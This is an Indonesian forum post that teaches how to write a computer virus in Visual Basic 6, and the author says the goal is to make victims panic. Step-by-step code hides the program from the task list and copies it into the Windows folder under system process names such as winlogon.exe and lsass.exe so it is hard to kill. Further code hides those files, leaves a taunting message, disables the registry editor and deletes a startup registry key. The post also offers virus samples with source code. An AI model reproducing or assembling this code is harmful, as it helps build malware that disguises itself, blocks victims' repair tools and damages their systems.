Apakah Kamu Sudah Punya ID,
Dan Mau Langsung Login ?
Jika Belum Segeralah Daftar
Berikan Post Dan Komentar Sebanyak Mungkin....!!!!!!






 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
My Facebook
Dnis Devonzs

Buat Lencana Anda
Statistics
Total 19 user terdaftar
User terdaftar terakhir adalah umazaki

Total 196 kiriman artikel dari user in 194 subjects
User Yang Sedang Online
Total 1 user online :: 0 Terdaftar, 0 Tersembunyi dan 1 Tamu

Tidak ada

User online terbanyak adalah 26 pada Mon Jun 18, 2012 3:47 pm

Share | 
 

 Membuat Virus Dengan Visual Basic

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
admin
Admin
Admin


Jumlah posting : 217
Points : 650
Reputation : 2
Join date : 25.02.11
Age : 23
Lokasi : blitar

PostSubyek: Membuat Virus Dengan Visual Basic   Wed Mar 02, 2011 6:23 am

Sebenarnya bikin virus itu menyenangkan, apalagi klo kita sampai bisa bikin orang kebakaran jengot gara2 virus kita. Aku mau berbagi sedikit ilmu nih tentang cara bikin virus dengan VB 6. Materi ini hanya untuk coba-coba saja atau kata lainnya ini masih dasarnya. Kamu mungkin bisa mengembangkannya sendiri. Oh ya, aku juga menyertakan satu contoh virus yang sudah aku buat namanya r3d_94l4xy. Untuk materi yang lebih berat akan disambung lain waktu. Bagi yang ingin mendapatkan sample virus tertentu dengan source codenya silakan contact Johan.

Pertama, bikin form buat virus kamu pake Standart exe saja

1. Nyembuin Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Kopiin Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attributes = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon



On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Nah sekian dulu materi yang kita pelajari, dari pada pusing,
Segini dulu aja ya, soalnya aku lagi persiapan buat lomba Debat Bahasa Inggris di Jember, tanggal 25 November nanti. Dan jangan lupa doain aku biar juara 1, OK ! Dan seperti biasanya, kalau ada pertanyaan, silakan bertanya jangan dipendam. Selamat Belajar
Kembali Ke Atas Go down
Lihat profil user http://cybers.my-goo.net
 
Membuat Virus Dengan Visual Basic
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Cara MenDesign Gear Dengan PhotoShop
» MEMBUAT GAME ASAH OTAK MEMAKAI POWER POINT
» bercanda dengan LOGIKA
» Fitur baru Readmore pada blogspot!
» [share] Caraku terhindar 100% dari Virus PC & Notebook ( No Deep Freeze )

Permissions in this forum:Anda tidak dapat menjawab topik
 :: Gamescool :: PointBlank-
Navigasi: